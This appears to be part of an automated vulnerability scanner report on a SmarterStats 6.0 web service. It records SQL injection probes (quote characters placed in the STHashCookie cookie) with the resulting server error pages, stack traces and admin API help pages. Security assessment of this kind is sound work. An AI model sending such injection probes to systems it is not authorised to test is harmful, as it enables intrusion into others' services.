<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%2527%2527; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:37 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 9415
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite2</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS and adds more than one log path.</p>

<h3>Test</h3>

The test form is only available for methods with primitive types as parameters.
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestConfigLogPaths&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;ConfigLogLocation&gt;
&lt;LocationGUID&gt;<font class=value>string</font>&lt;/LocationGUID&gt;
&lt;FileWildcard&gt;<font class=value>string</font>&lt;/FileWildcard&gt;
&lt;MaxDays&gt;<font class=value>int</font>&lt;/MaxDays&gt;
&lt;FilePath&gt;<font class=value>string</font>&lt;/FilePath&gt;
&lt;/ConfigLogLocation&gt;
&lt;/DestConfigLogPaths&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:41 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 11500
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>DeleteSiteByName</h2>
<p class="intro">Deletes a site that exists in the MRS by using the site name.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/DeleteSiteByName' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteName:</td>
<td><input class="frmInput" type="text" size="50" name="SiteName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DeleteFiles:</td>
<td><input class="frmInput" type="text" size="50" name="DeleteFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/DeleteSiteByName"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
